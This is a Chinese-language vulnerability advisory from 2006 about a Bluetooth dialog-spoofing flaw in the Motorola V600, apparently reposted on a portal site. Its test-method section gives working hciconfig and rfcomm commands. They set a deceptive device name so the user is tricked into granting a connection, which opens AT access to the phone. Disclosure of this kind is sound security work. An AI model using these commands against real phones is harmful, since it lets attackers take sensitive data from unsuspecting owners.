Motorola蓝牙接口存在对话框伪造漏洞

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

漏洞信息

Motorola V600支持蓝牙功能。

Motorola V600蓝牙接收存在对话框伪造问题,远程攻击者可以利用漏洞获得敏感信息。

当接收到蓝牙通信时,攻击者可利用该问题诱使用户进入AT访问设备,可借此获得敏感信息。

BUGTRAQ ID: 17190

CNCAN ID:CNCAN-2006032305

漏洞消息时间:2006-03-22

漏洞起因

输入验证错误

影响系统

Motorola V600

危害

远程攻击者可以利用漏洞获得敏感信息。

攻击所需条件

攻击者必须可以访问Motorola V600。

测试方法

# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`

# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)

Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3

Press CTRL-C for hangup

厂商解决方案

联系供应商获得补丁方案:

http://www.motorola.com/motoinfo/product/details/0,,11,00.html

漏洞提供者

Kevin Finisterre

漏洞消息链接

http://marc.theaimsgroup.com/?l=bugtraq&m=114304846013066&w=2

漏洞消息标题

DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航